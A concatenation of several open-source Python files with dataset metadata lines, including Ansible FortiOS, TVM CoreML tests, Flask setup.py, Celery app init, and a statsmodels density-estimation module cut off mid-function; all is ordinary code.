flattened_data = flatten_multilists_attributes(log_syslogd_override_setting_data)
filtered_data = filter_log_syslogd_override_setting_data(flattened_data)
return fos.set('log.syslogd',
'override-setting',
data=filtered_data,
vdom=vdom)
def fortios_log_syslogd(data, fos):
login(data)
if data['log_syslogd_override_setting']:
resp = log_syslogd_override_setting(data, fos)
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"log_syslogd_override_setting": {
"required": False, "type": "dict",
"options": {
"certificate": {"required": False, "type": "str"},
"custom-field-name": {"required": False, "type": "list",
"options": {
"custom": {"required": False, "type": "str"},
"id": {"required": True, "type": "int"},
"name": {"required": False, "type": "str"}
}},
"enc-algorithm": {"required": False, "type": "str",
"choices": ["high-medium", "high", "low",
"disable"]},
"facility": {"required": False, "type": "str",
"choices": ["kernel", "user", "mail",
"daemon", "auth", "syslog",
"lpr", "news", "uucp",
"cron", "authpriv", "ftp",
"ntp", "audit", "alert",
"clock", "local0", "local1",
"local2", "local3", "local4",
"local5", "local6", "local7"]},
"format": {"required": False, "type": "str",
"choices": ["default", "csv", "cef"]},
"mode": {"required": False, "type": "str",
"choices": ["udp", "legacy-reliable", "reliable"]},
"override": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"port": {"required": False, "type": "int"},
"server": {"required": False, "type": "str"},
"source-ip": {"required": False, "type": "str"},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_log_syslogd(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,582,874,373,944,974,000 | 31.117949 | 104 | 0.509181 | false |
cmvandrevala/finance_scripts | tests/portfolio_creator/test_portfolio_creator.py | 1 | 4436 | import unittest
import json
from portfolio_creator.portfolio_creator import PortfolioCreator
class MockDataSource:
def get(self):
return json.dumps({"snapshots": [{"timestamp": "2017-01-02",
"institution": "John's Union",
"account": "Checking",
"owner": "Robert",
"investment": "CASHX",
"asset": True,
"value": 98066,
"asset_class": "Cash Equivalents",
"update_frequency": 12,
"open_date": None},
{"timestamp": "2017-10-25",
"institution": "Bob's Bank",
"account": "Credit Card",
"owner": "John",
"investment": "CASHX",
"asset": False,
"value": 100000,
"asset_class": "None",
"update_frequency": 22,
"open_date": "2000-11-12",
"term": "medium"},
{"timestamp": "2017-10-26",
"institution": "Sam's Bank",
"account": "Credit Card",
"owner": "John",
"investment": "CASHX",
"asset": False,
"value": 100000,
"update_frequency": 195,
"open_date": "2017-1-1",
"term": None}
]})
class PortfolioCreatorTestCase(unittest.TestCase):
def setUp(self):
self.portfolio = PortfolioCreator().create(MockDataSource())
def test_it_creates_a_portfolio(self):
self.assertAlmostEqual(self.portfolio.total_value(), -1019.34)
self.assertEqual(self.portfolio.percentages(), {"CASHX": 1.0})
self.assertEqual(self.portfolio.asset_classes(),
{'Annuities': 0.0, 'Cash Equivalents': 1.0, 'Commodities': 0.0, 'Equities': 0.0,
'Fixed Assets': 0.0, 'Fixed Income': 0.0, 'Real Estate': 0.0})
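        # The expected total follows from the snapshot values if they are stored in cents:
        # 98066 - 100000 - 100000 = -101934, i.e. -1019.34 after dividing by 100 (an assumption
        # about units; the mock data itself only gives the raw integers).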
def test_it_assigns_the_correct_names_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.name(), "Checking")
second_account = accounts[1]
self.assertEqual(second_account.name(), "Credit Card")
third_account = accounts[2]
self.assertEqual(third_account.name(), "Credit Card")
def test_it_assigns_the_correct_update_frequencies_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.update_frequency(), 12)
second_account = accounts[1]
self.assertEqual(second_account.update_frequency(), 22)
third_account = accounts[2]
self.assertEqual(third_account.update_frequency(), 195)
def test_it_assigns_the_correct_open_dates_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.open_date(), None)
second_account = accounts[1]
self.assertEqual(second_account.open_date(), "2000-11-12")
third_account = accounts[2]
self.assertEqual(third_account.open_date(), "2017-1-1")
def test_it_assigns_the_correct_terms_to_the_accounts(self):
accounts = self.portfolio.accounts
first_account = accounts[0]
self.assertEqual(first_account.term(), "none")
second_account = accounts[1]
self.assertEqual(second_account.term(), "medium")
third_account = accounts[2]
self.assertEqual(third_account.term(), "none")
if __name__ == '__main__':
unittest.main()
| mit | 3,293,467,591,836,899,000 | 47.217391 | 105 | 0.457845 | false |
stef1927/python-driver | docs/conf.py | 6 | 7188 | # -*- coding: utf-8 -*-
#
# Cassandra Driver documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 1 11:40:09 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
import cassandra
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Cassandra Driver'
copyright = u'2013-2016 DataStax'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = cassandra.__version__
# The full version, including alpha/beta/rc tags.
release = cassandra.__version__
autodoc_member_order = 'bysource'
autoclass_content = 'both'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'custom'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['./themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'CassandraDriverdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'cassandra-driver.tex', u'Cassandra Driver Documentation', u'DataStax', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cassandra-driver', u'Cassandra Driver Documentation',
[u'Tyler Hobbs'], 1)
]
| apache-2.0 | 4,259,747,190,828,340,700 | 31.672727 | 96 | 0.711603 | false |
dmlc/tvm | tests/python/contrib/test_coreml_codegen.py | 3 | 6157 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import pytest
from unittest import mock
import tvm
from tvm import relay
from tvm.relay import transform
from tvm.contrib.target import coreml as _coreml
pytest.importorskip("coremltools")
def _has_xcode():
try:
tvm.contrib.xcode.xcrun([])
return True
except FileNotFoundError:
pass
return False
def _create_graph():
shape = (10, 10)
mod = tvm.IRModule()
x = relay.var("x", shape=shape)
y = relay.var("y", shape=shape)
z = x + x
p = y * y
func = relay.Function([x, y], p - z)
mod["main"] = func
return mod
def _create_graph_annotated():
shape = (10, 10)
target = "coremlcompiler"
mod = tvm.IRModule()
# function 0
f0_i0 = relay.var(target + "_0_i0", shape=shape)
func0 = relay.Function([f0_i0], f0_i0 * f0_i0)
func0 = func0.with_attr("Primitive", tvm.tir.IntImm("int32", 1))
func0 = func0.with_attr("Inline", tvm.tir.IntImm("int32", 1))
func0 = func0.with_attr("Compiler", target)
func0 = func0.with_attr("global_symbol", target + "_0")
gv0 = relay.GlobalVar(target + "_0")
mod[gv0] = func0
# function 2
f2_i0 = relay.var(target + "_2_i0", shape=shape)
func2 = relay.Function([f2_i0], f2_i0 + f2_i0)
func2 = func2.with_attr("Primitive", tvm.tir.IntImm("int32", 1))
func2 = func2.with_attr("Inline", tvm.tir.IntImm("int32", 1))
func2 = func2.with_attr("Compiler", target)
func2 = func2.with_attr("global_symbol", target + "_2")
gv2 = relay.GlobalVar(target + "_2")
mod[gv2] = func2
mod = relay.transform.InferType()(mod)
# body
x = relay.var("x", shape=shape)
y = relay.var("y", shape=shape)
func = relay.Function([x, y], gv0(y) - gv2(x))
mod["main"] = func
mod = relay.transform.InferType()(mod)
return mod
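# Note: _create_graph_annotated() is a hand-built version of what partitioning _create_graph()
# is expected to produce: the multiply (y * y) and the add (x + x) each become a separate
# "coremlcompiler" sub-function, and main computes gv0(y) - gv2(x).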
def test_annotate():
mod = _create_graph()
mod = transform.AnnotateTarget("coremlcompiler")(mod)
mod = transform.PartitionGraph()(mod)
expected = _create_graph_annotated()
assert tvm.ir.structural_equal(mod, expected, map_free_vars=True)
@pytest.mark.skipif(not _has_xcode(), reason="Xcode is not available")
def test_compile_and_run():
ctx = tvm.cpu()
target = "llvm"
tol = 1e-3
with relay.build_config(opt_level=3):
lib = relay.build(_create_graph_annotated(), target=target)
m = tvm.contrib.graph_runtime.GraphModule(lib["default"](ctx))
shape = (10, 10)
x_data = np.random.rand(*shape).astype("float32")
y_data = np.random.rand(*shape).astype("float32")
m.set_input("x", x_data)
m.set_input("y", y_data)
m.run()
out = tvm.nd.empty(shape, ctx=ctx)
out = m.get_output(0, out)
expected = (y_data * y_data) - (x_data + x_data)
tvm.testing.assert_allclose(out.asnumpy(), expected, rtol=tol, atol=tol)
@mock.patch("tvm.contrib.coreml_runtime.create")
@mock.patch("tvm.contrib.xcode.compile_coreml")
def _construct_model(func, m1, m2):
mod = tvm.IRModule()
mod["main"] = func
mod = transform.AnnotateTarget("coremlcompiler")(mod)
mod = transform.PartitionGraph()(mod)
fcompile = tvm._ffi.get_global_func("relay.ext.coremlcompiler")
for var, func in mod.functions.items():
if func.attrs and "Compiler" in func.attrs and func.attrs["Compiler"] == "coremlcompiler":
fcompile(func)
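# Note: the mock.patch decorators above stub out tvm.contrib.coreml_runtime.create and
# tvm.contrib.xcode.compile_coreml, so the "relay.ext.coremlcompiler" codegen path can be
# exercised without Xcode or a CoreML runtime being installed.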
def test_add():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = x + x
func = relay.Function([x], y)
_construct_model(func)
def test_multiply():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = x * x
func = relay.Function([x], y)
_construct_model(func)
def test_clip():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.clip(x, a_min=0.0, a_max=1.0)
func = relay.Function([x], y)
_construct_model(func)
def test_batch_flatten():
shape = (10, 10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.batch_flatten(x)
func = relay.Function([x], y)
_construct_model(func)
def test_expand_dims():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.expand_dims(x, axis=0)
func = relay.Function([x], y)
_construct_model(func)
y = relay.expand_dims(x, axis=-1)
func = relay.Function([x], y)
_construct_model(func)
def test_relu():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.relu(x)
func = relay.Function([x], y)
_construct_model(func)
def test_softmax():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.softmax(x, axis=1)
func = relay.Function([x], y)
_construct_model(func)
def test_conv2d():
x = relay.var("x", shape=(1, 3, 224, 224))
w = relay.const(np.zeros((16, 3, 3, 3), dtype="float32"))
y = relay.nn.conv2d(x, w, strides=[2, 2], padding=[1, 1, 1, 1], kernel_size=[3, 3])
func = relay.Function([x], y)
_construct_model(func)
def test_global_avg_pool2d():
shape = (10, 10, 10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.global_avg_pool2d(x)
func = relay.Function([x], y)
_construct_model(func)
if __name__ == "__main__":
test_annotate()
test_compile_and_run()
test_add()
test_multiply()
test_clip()
test_expand_dims()
test_relu()
test_batch_flatten()
test_softmax()
test_conv2d()
test_global_avg_pool2d()
| apache-2.0 | 1,426,598,191,818,227,700 | 26.243363 | 98 | 0.626117 | false |
abhishekgahlot/flask | setup.py | 9 | 3041 | """
Flask
-----
Flask is a microframework for Python based on Werkzeug, Jinja 2 and good
intentions. And before you ask: It's BSD licensed!
Flask is Fun
````````````
.. code:: python
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run()
And Easy to Setup
`````````````````
.. code:: bash
$ pip install Flask
$ python hello.py
* Running on http://localhost:5000/
Links
`````
* `website <http://flask.pocoo.org/>`_
* `documentation <http://flask.pocoo.org/docs/>`_
* `development version
<http://github.com/mitsuhiko/flask/zipball/master#egg=Flask-dev>`_
"""
from __future__ import print_function
from setuptools import Command, setup
class run_audit(Command):
"""Audits source code using PyFlakes for following issues:
- Names which are used but not defined or used before they are defined.
- Names which are redefined without having been used.
"""
description = "Audit source code with PyFlakes"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import os, sys
try:
import pyflakes.scripts.pyflakes as flakes
except ImportError:
print("Audit requires PyFlakes installed in your system.")
sys.exit(-1)
warns = 0
# Define top-level directories
dirs = ('flask', 'examples', 'scripts')
for dir in dirs:
for root, _, files in os.walk(dir):
for file in files:
if file != '__init__.py' and file.endswith('.py') :
warns += flakes.checkPath(os.path.join(root, file))
if warns > 0:
print("Audit finished with total %d warnings." % warns)
else:
print("No problems found in sourcecode.")
setup(
name='Flask',
version='0.11-dev',
url='http://github.com/mitsuhiko/flask/',
license='BSD',
author='Armin Ronacher',
author_email='[email protected]',
description='A microframework based on Werkzeug, Jinja2 '
'and good intentions',
long_description=__doc__,
packages=['flask', 'flask.ext', 'flask.testsuite'],
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'Werkzeug>=0.7',
'Jinja2>=2.4',
'itsdangerous>=0.21'
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
],
cmdclass={'audit': run_audit},
test_suite='flask.testsuite.suite'
)
| bsd-3-clause | 4,386,557,360,297,393,000 | 26.396396 | 79 | 0.585663 | false |
job/pypeer | bin/get_routes_from_session.py | 2 | 1560 | #!/usr/bin/env python
import argparse
import sys
from lxml import etree
sys.path.append('./lib')
from jnpr.junos import Device
from pypeer.ConfigDictionary import ConfigDictionary
from pypeer.RouteData import RouteData
def main(device_ip, peer_ip):
config = ConfigDictionary()
username = config.username()
password = config.password()
print (device_ip + " logging in as " + username)
jdev = Device(user=username, host=device_ip, password=password)
jdev.open(gather_facts=False)
jdev.timeout = 6000
try:
resultxml = jdev.rpc.get_route_information(table='inet.0',
protocol='bgp',
peer=peer_ip,
extensive=True)
except Exception as err:
print "CMD:"
etree.dump(err.cmd)
print "RSP:"
etree.dump(err.rsp)
for routexml in resultxml.findall('.//rt'):
route = RouteData(routexml)
print "destination: " + route.prefix() + "as-path: " + route.aspath()
jdev.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Dump a routing table as offered by a BGP neighbo(u)r')
parser.add_argument('--ipaddr', dest='ipaddr', help='bgp router ip address', required=True)
parser.add_argument('--bgppeer', dest='bgppeer', help='bgp peer address', required=True)
args = parser.parse_args()
device_ip = args.ipaddr
peer_ip = args.bgppeer
main(device_ip, peer_ip)
| mit | -1,282,931,392,251,232,000 | 27.363636 | 104 | 0.6 | false |
simgislab/osm-geocode | address_parser.py | 1 | 2655 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import sys
import locale
try:
from osgeo import ogr, osr, gdal
except ImportError:
import ogr, osr, gdal
#global vars
_fs_encoding = sys.getfilesystemencoding()
_message_encoding = locale.getdefaultlocale()[1]
class AddressParser():
def parse(self, sqlite_file):
drv = ogr.GetDriverByName("SQLite")
gdal.ErrorReset()
data_source = drv.Open(sqlite_file.encode('utf-8'), True)
if data_source is None:
self.__show_err("SQLite file can't be opened!\n" + unicode(gdal.GetLastErrorMsg(), _message_encoding))
return
#setup fast writing
sql_lyr = data_source.ExecuteSQL('PRAGMA journal_mode=OFF')
if sql_lyr is not None:
data_source.ReleaseResultSet(sql_lyr)
sql_lyr = data_source.ExecuteSQL('PRAGMA synchronous=0')
if sql_lyr is not None:
data_source.ReleaseResultSet(sql_lyr)
sql_lyr = data_source.ExecuteSQL('PRAGMA cache_size=100000')
if sql_lyr is not None:
data_source.ReleaseResultSet(sql_lyr)
layer = data_source[0]
all_feats = []
layer.ResetReading()
feat = layer.GetNextFeature()
while feat is not None:
all_feats.append(feat)
feat = layer.GetNextFeature()
for feat in all_feats:
addr = feat['addr_v']
if not addr:
continue
addr = unicode(addr, 'utf-8').replace(u'п.', '').replace(u'с.', '').replace(u'г.', '').strip()
addr = addr.replace(u'ул.', '').replace(u'пр.', '').replace(u'пр-т', '').replace(u'пер.', '').strip()
addr = addr.replace(u'д.', '').replace(u'дом', '').strip()
feat.SetField("g_addr", addr.encode('utf-8'))
if layer.SetFeature(feat) != 0:
print 'Failed to update feature.'
#close DS's
data_source.Destroy()
def __show_err(self, msg):
print "Error: " + msg
| gpl-2.0 | 1,332,626,209,184,329,700 | 36.685714 | 114 | 0.50417 | false |
johankaito/fufuka | microblog/flask/venv/lib/python2.7/site-packages/celery/app/__init__.py | 6 | 4380 | # -*- coding: utf-8 -*-
"""
celery.app
~~~~~~~~~~
Celery Application.
"""
from __future__ import absolute_import
import os
from celery.local import Proxy
from celery import _state
from celery._state import (
get_current_app as current_app,
get_current_task as current_task,
connect_on_app_finalize, set_default_app, _get_active_apps, _task_stack,
)
from celery.utils import gen_task_name
from .base import Celery, AppPickler
__all__ = ['Celery', 'AppPickler', 'default_app', 'app_or_default',
'bugreport', 'enable_trace', 'disable_trace', 'shared_task',
'set_default_app', 'current_app', 'current_task',
'push_current_task', 'pop_current_task']
#: Proxy always returning the app set as default.
default_app = Proxy(lambda: _state.default_app)
#: Function returning the app provided or the default app if none.
#:
#: The environment variable :envvar:`CELERY_TRACE_APP` is used to
#: trace app leaks. When enabled an exception is raised if there
#: is no active app.
app_or_default = None
#: The 'default' loader is the default loader used by old applications.
#: This is deprecated and should no longer be used as it's set too early
#: to be affected by --loader argument.
default_loader = os.environ.get('CELERY_LOADER') or 'default' # XXX
#: Function used to push a task to the thread local stack
#: keeping track of the currently executing task.
#: You must remember to pop the task after.
push_current_task = _task_stack.push
#: Function used to pop a task from the thread local stack
#: keeping track of the currently executing task.
pop_current_task = _task_stack.pop
def bugreport(app=None):
return (app or current_app()).bugreport()
def _app_or_default(app=None):
if app is None:
return _state.get_current_app()
return app
def _app_or_default_trace(app=None): # pragma: no cover
from traceback import print_stack
from billiard import current_process
if app is None:
if getattr(_state._tls, 'current_app', None):
print('-- RETURNING TO CURRENT APP --') # noqa+
print_stack()
return _state._tls.current_app
if current_process()._name == 'MainProcess':
raise Exception('DEFAULT APP')
print('-- RETURNING TO DEFAULT APP --') # noqa+
print_stack()
return _state.default_app
return app
def enable_trace():
global app_or_default
app_or_default = _app_or_default_trace
def disable_trace():
global app_or_default
app_or_default = _app_or_default
if os.environ.get('CELERY_TRACE_APP'): # pragma: no cover
enable_trace()
else:
disable_trace()
App = Celery # XXX Compat
def shared_task(*args, **kwargs):
"""Create shared tasks (decorator).
    Will return a proxy that always takes the task from the current app's
task registry.
This can be used by library authors to create tasks that will work
for any app environment.
Example:
>>> from celery import Celery, shared_task
>>> @shared_task
... def add(x, y):
... return x + y
>>> app1 = Celery(broker='amqp://')
>>> add.app is app1
True
>>> app2 = Celery(broker='redis://')
        >>> add.app is app2
        True
"""
def create_shared_task(**options):
def __inner(fun):
name = options.get('name')
# Set as shared task so that unfinalized apps,
# and future apps will load the task.
connect_on_app_finalize(
lambda app: app._task_from_fun(fun, **options)
)
# Force all finalized apps to take this task as well.
for app in _get_active_apps():
if app.finalized:
with app._finalize_mutex:
app._task_from_fun(fun, **options)
# Return a proxy that always gets the task from the current
# apps task registry.
def task_by_cons():
app = current_app()
return app.tasks[
name or gen_task_name(app, fun.__name__, fun.__module__)
]
return Proxy(task_by_cons)
return __inner
if len(args) == 1 and callable(args[0]):
return create_shared_task(**kwargs)(args[0])
return create_shared_task(*args, **kwargs)
| apache-2.0 | -3,282,554,475,946,911,000 | 28.2 | 76 | 0.612329 | false |
yarikoptic/pystatsmodels | statsmodels/sandbox/nonparametric/densityorthopoly.py | 3 | 17839 | # -*- coding: cp1252 -*-
# some cut and paste characters are not ASCII
'''density estimation based on orthogonal polynomials
Author: Josef Perktold
Created: 2011-05-17
License: BSD
2 versions work: based on Fourier, FPoly, and chebychev T, ChebyTPoly
also hermite polynomials, HPoly, works
other versions need normalization
TODO:
* check fourier case again: base is orthonormal,
but needs offsetfact = 0 and doesn't integrate to 1, rescaled looks good
* hermite: works but DensityOrthoPoly requires currently finite bounds
  I use it with offsetfactor 0.5 in the example
* not implemented methods:
- add bonafide density correction
- add transformation to domain of polynomial base - DONE
possible problem: what is the behavior at the boundary,
offsetfact requires more work, check different cases, add as option
moved to polynomial class by default, as attribute
* convert examples to test cases
* need examples with large density on boundary, beta ?
* organize poly classes in separate module, check new numpy.polynomials,
polyvander
* MISE measures, order selection, ...
enhancements:
* other polynomial bases: especially for open and half open support
* wavelets
* local or piecewise approximations
'''
from scipy import stats, integrate
import numpy as np
sqr2 = np.sqrt(2.)
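# The estimator implemented below is the classical orthogonal series density
# estimator: given an orthonormal basis p_0, p_1, ... on the (transformed)
# support, the density is approximated by
#
#     fhat(x) = sum_{k < order} c_k * p_k(x),  with  c_k = (1/n) * sum_i p_k(x_i)
#
# which is what DensityOrthoPoly.fit computes via coeffs = [(p(x)).mean() ...],
# followed by a "bona fide" correction so that the estimate integrates to one.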
class FPoly(object):
'''Orthonormal (for weight=1) Fourier Polynomial on [0,1]
    orthonormal polynomial, but the density needs a correction factor (corfactor)
    that I have not been able to derive analytically
parameterization on [0,1] from
Sam Efromovich: Orthogonal series density estimation,
    2010 John Wiley & Sons, Inc. WIREs Comp Stat 2010, 2: 467-476
'''
def __init__(self, order):
self.order = order
self.domain = (0, 1)
self.intdomain = self.domain
def __call__(self, x):
if self.order == 0:
return np.ones_like(x)
else:
return sqr2 * np.cos(np.pi * self.order * x)
class F2Poly(object):
'''Orthogonal (for weight=1) Fourier Polynomial on [0,pi]
is orthogonal but first component doesn't square-integrate to 1
final result seems to need a correction factor of sqrt(pi)
_corfactor = sqrt(pi) from integrating the density
Parameterization on [0, pi] from
Peter Hall, Cross-Validation and the Smoothing of Orthogonal Series Density
Estimators, JOURNAL OF MULTIVARIATE ANALYSIS 21, 189-206 (1987)
'''
def __init__(self, order):
self.order = order
self.domain = (0, np.pi)
self.intdomain = self.domain
self.offsetfactor = 0
def __call__(self, x):
if self.order == 0:
return np.ones_like(x) / np.sqrt(np.pi)
else:
return sqr2 * np.cos(self.order * x) / np.sqrt(np.pi)
class ChebyTPoly(object):
'''Orthonormal (for weight=1) Chebychev Polynomial on (-1,1)
Notes
-----
    integration requires staying away from the boundary, i.e. offsetfactor > 0.
    Maybe this implies that we cannot use it for densities that are > 0 at the
    boundary, or maybe there is a numerical problem close to the boundary, since
    integration sometimes works.
'''
def __init__(self, order):
self.order = order
from scipy.special import chebyt
self.poly = chebyt(order)
self.domain = (-1, 1)
self.intdomain = (-1+1e-6, 1-1e-6)
#not sure if I need this, in integration nans are possible on the boundary
self.offsetfactor = 0.01 #required for integration
def __call__(self, x):
if self.order == 0:
return np.ones_like(x) / (1-x**2)**(1/4.) /np.sqrt(np.pi)
else:
return self.poly(x) / (1-x**2)**(1/4.) /np.sqrt(np.pi) *np.sqrt(2)
from scipy.misc import factorial
from scipy import special
logpi2 = np.log(np.pi)/2
class HPoly(object):
'''Orthonormal (for weight=1) Hermite Polynomial, uses finite bounds
    for current use with DensityOrthoPoly the domain is defined as [-6, 6]
'''
def __init__(self, order):
self.order = order
from scipy.special import hermite
self.poly = hermite(order)
self.domain = (-6, +6)
self.offsetfactor = 0.5 # note this is
def __call__(self, x):
k = self.order
lnfact = -(1./2)*(k*np.log(2.) + special.gammaln(k+1) + logpi2) - x*x/2
fact = np.exp(lnfact)
return self.poly(x) * fact
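# The factor exp(lnfact) above equals (2**k * k! * sqrt(pi))**(-1/2) * exp(-x*x/2),
# so HPoly(k)(x) is the k-th Hermite function
#     psi_k(x) = (2**k * k! * sqrt(pi))**(-1/2) * H_k(x) * exp(-x**2 / 2),
# which is orthonormal with weight 1 on the real line (truncated here to the
# finite domain [-6, 6] used by DensityOrthoPoly).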
def polyvander(x, polybase, order=5):
polyarr = np.column_stack([polybase(i)(x) for i in range(order)])
return polyarr
def inner_cont(polys, lower, upper, weight=None):
'''inner product of continuous function (with weight=1)
Parameters
----------
polys : list of callables
polynomial instances
lower : float
lower integration limit
upper : float
upper integration limit
weight : callable or None
weighting function
Returns
-------
innp : ndarray
symmetric 2d square array with innerproduct of all function pairs
err : ndarray
numerical error estimate from scipy.integrate.quad, same dimension as innp
Examples
--------
>>> from scipy.special import chebyt
>>> polys = [chebyt(i) for i in range(4)]
>>> r, e = inner_cont(polys, -1, 1)
>>> r
array([[ 2. , 0. , -0.66666667, 0. ],
[ 0. , 0.66666667, 0. , -0.4 ],
[-0.66666667, 0. , 0.93333333, 0. ],
[ 0. , -0.4 , 0. , 0.97142857]])
'''
n_polys = len(polys)
innerprod = np.empty((n_polys, n_polys))
innerprod.fill(np.nan)
interr = np.zeros((n_polys, n_polys))
for i in range(n_polys):
for j in range(i+1):
p1 = polys[i]
